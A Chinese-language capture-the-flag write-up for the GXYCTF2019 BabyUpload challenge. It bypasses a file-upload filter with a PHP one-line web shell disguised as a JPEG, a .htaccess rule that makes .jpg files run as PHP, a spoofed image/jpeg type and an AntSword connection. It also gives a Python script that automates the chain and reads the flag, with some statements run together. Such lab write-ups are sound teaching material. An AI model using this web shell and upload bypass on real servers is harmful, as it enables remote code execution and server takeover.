[upload]-[GXYCTF2019]BabyUpload1-笔记

尝试上传.htaccess和图片和一句话木马提示

 php文件提示

 响应头可以看到

 构造一句话图片木马如下：

<script language='php'>eval($_POST['cmd']);</script> 上传成功

 必须增加文件夹下jpg后缀解析php

.htaccess如下

<FilesMatch "jpg">SetHandler application/x-httpd-php</FilesMatch>

需要修改文件类型，image/jpeg,如下，上传成功

蚁剑链接

根据刚才上传图片木马的地址，用蚁剑链接如下

http://a756579c-2d99-4546-b126-d1099134f355.node5.buuoj.cn:81/upload/5337bb98317fcb575ce52329036efce2/u1.jpg

 根目录下发现flag

flag{b35d29a2-b3da-42db-9f8b-9ca91436173e}

参考python方案：

import requests
url = "http://172.21.4.12:10011/"
session = requests.session()
htaccess = {'uploaded': ('.htaccess', "SetHandler application/x-httpd-php", 'image/jpeg')}
res_hta = session.post(url, files=htaccess)files = {'uploaded': ('123.jpg', "<script language=\"php\">echo file_get_contents(\"/flag\");</script>", 'image/jpeg')}
res_jpg = session.post(url, files=files)res_shell = session.post(url + res_jpg.text[-69:-22], data = {'a':'echo file_get_contents(\'/flag\');'})print(res_shell.text)